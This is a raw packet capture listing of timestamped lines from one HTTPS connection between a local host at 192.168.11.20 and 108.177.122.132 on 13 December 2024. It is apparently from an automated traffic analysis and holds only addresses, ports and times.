Dec 13, 2024 08:50:39.393527985 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.395661116 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.395862103 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.395900011 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.396142006 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.398248911 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.398401976 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.398438931 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.398684025 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.400729895 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.400922060 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.400958061 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.401200056 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.403292894 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.403491020 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.403527021 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.403736115 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.405829906 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.406050920 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.406086922 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.406323910 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.408261061 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.408524036 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.408561945 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.408790112 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.410727978 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.410959005 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.411000013 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.411207914 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.413199902 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.413419962 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.413458109 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.413727999 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.415652990 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.415982008 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.416019917 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.416201115 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.418067932 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.418271065 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.418308020 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.418528080 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.420424938 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.420633078 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.420669079 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.420823097 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.422837973 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.423041105 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.423089027 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.423285007 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.425143957 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.425357103 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.425395012 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.425610065 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.427615881 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.427839041 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.427875996 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.428049088 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.429881096 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.430185080 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.430228949 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.430412054 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.435832977 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.435986042 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.436016083 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.436058044 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.436203957 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.436203957 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.436249018 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.436419010 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.436670065 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.436863899 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.436902046 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.437086105 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.438878059 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.439071894 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.439110041 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.439302921 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.441040039 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.441284895 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.441320896 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.441499949 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.443203926 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.443461895 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.443499088 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.443710089 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.445346117 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.445565939 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.445605993 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.445913076 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.447550058 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.447782993 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.447819948 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.448102951 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.450210094 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.450407982 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.450443983 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.450642109 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.454991102 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.455224991 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.455261946 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.455491066 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.455971003 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.456178904 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.456216097 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.456423044 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.457978010 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.458257914 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.458295107 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.458558083 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.460735083 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.460912943 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.460952997 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.461154938 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.461173058 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.461358070 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.461930037 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.462244987 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.462281942 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.462449074 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.463771105 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.463975906 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.464776039 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.464991093 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.465027094 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.465218067 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.466706991 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.466917038 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.466953993 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.467138052 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.468549013 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.468760967 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.468797922 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.468936920 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.470408916 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.470599890 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.470635891 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.470959902 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.472186089 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.472347021 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.472383022 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.472573042 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.474020958 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.474225998 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.474263906 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.474450111 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.475805044 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.476027966 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.476063967 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.476222038 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.477574110 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.477751017 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.477787971 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.477938890 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.479199886 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.479387045 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.479398012 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.479595900 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.480869055 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.481096029 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.481111050 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.481268883 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.482625008 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.482887983 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.482898951 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.483136892 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.484286070 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.484450102 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.484460115 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.484641075 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.485898018 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.486083984 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.486093998 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.486310005 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.487602949 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.487756968 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.487766981 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.487929106 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.489181995 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.489399910 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.489408970 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.489625931 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.490761042 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.490983963 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.490993023 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.491154909 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.492361069 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.492619038 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.492629051 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.492815018 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.493930101 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.494102955 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.494113922 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.494323969 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.495464087 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.495639086 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.495647907 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.495834112 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.497033119 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.497209072 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.497217894 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.497433901 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.498579025 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.498796940 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.498806000 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.499032021 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.500030994 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.500257015 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.500266075 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.500432014 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.501542091 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.501800060 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.501807928 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.502007961 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.503046989 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.503243923 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.503252983 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.503426075 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.504448891 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.504633904 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.504642010 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.504829884 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.505939007 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.506108046 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.506117105 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.506325006 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.507370949 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.507519960 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.507528067 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.507679939 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.508760929 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.508918047 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.508946896 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.509169102 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.510293961 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.510534048 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.510543108 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.510746956 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.511553049 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.511785030 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.511794090 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.511944056 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.512960911 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.513123989 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.513132095 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.513294935 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.514302015 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.514473915 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.514482021 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.514672995 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.515717983 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.515935898 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.515959978 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.516217947 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.516954899 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.517153978 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.517163038 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.517362118 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.518362999 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.518582106 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.518589973 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.518830061 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.519644976 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.519804001 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.519813061 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.520036936 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.520961046 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.521127939 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.521136999 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.521353006 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.522222996 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.522413015 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.522422075 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.522694111 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.523514986 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.523718119 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.523726940 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.524038076 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.524784088 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.524955034 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.524981022 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.525188923 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.526036978 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.526294947 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.526304007 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.526472092 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.527348995 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.527565002 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.527574062 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.527812958 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.528531075 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.528716087 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.528723955 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.528892994 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.529767990 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.529958963 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.529968023 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.530142069 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.530993938 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.531194925 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.531203032 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.531377077 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.532202005 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.532363892 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.532372952 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.532598019 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.533354044 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.533572912 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.533581972 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.533814907 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.534567118 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.534744024 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.534751892 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.534986019 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.535722971 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.535975933 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.535984993 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.536156893 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.536914110 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.537132978 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.537142038 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.537317991 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.538090944 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.538255930 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.538264990 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.538523912 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.539252996 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.539438963 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.539447069 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.539696932 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.540358067 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.540530920 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.540539980 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.540710926 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.541537046 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.541687012 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.541696072 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.541945934 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.542614937 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.542752028 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.542761087 CET	443	49715	108.177.122.132	192.168.11.20
